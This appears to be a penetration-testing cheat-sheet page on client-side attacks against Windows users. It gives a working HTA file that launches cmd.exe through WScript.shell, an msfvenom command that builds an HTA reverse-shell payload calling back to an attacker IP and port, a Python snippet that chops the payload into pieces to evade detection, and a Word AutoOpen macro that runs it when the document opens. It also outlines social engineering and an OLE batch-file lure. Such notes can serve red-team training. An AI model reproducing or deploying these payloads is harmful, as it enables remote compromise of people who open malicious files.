Client Side Attacks
Enumeration
Passive Enumeration:
Identify the victim's browser.
Active Enumeration:
Social Engineering:
Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.
Leveraging HTML Apps
Tool: fingerprintjs2
A JavaScript library to uniquely identify a browser based on its features.
HTA Attack:
Create an HTA (HTML Application) to execute malicious scripts.
Example HTA file (
file.hta
):<!DOCTYPE html> <html> <head> <script> var x='cmd.exe' new ActiveXObject('WScript.shell').Run(x); </script> </head> <body> <script> self.close() </script> </body> </html>
Copy the HTA file to a web server:
sudo cp file.hta /var/www/html/file2.hta
Generate an HTA payload with msfvenom:
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
Exploiting Microsoft Office
Word Macro:
Split the payload to evade detection.
str="" # payload from msfvenom n=50 for i in range(0,len(str),n): print "str = Str +" + '"' + str[i:i+n] + '"'
Add the split payload to a Word Macro (
document.docm
).Sub AutoOpen() test1 End Sub Sub Doc_Open() test1 End Sub Sub test1() Dim Str As String ' Add the splitted payload here CreateObject("Wscript.shell").Run Str End Sub
Object Linking and Embedding (OLE):
Create an evil batch file (
evil.bat
).Create a link object in the Word document (
document.docm
).
Resources:
Last updated
Was this helpful?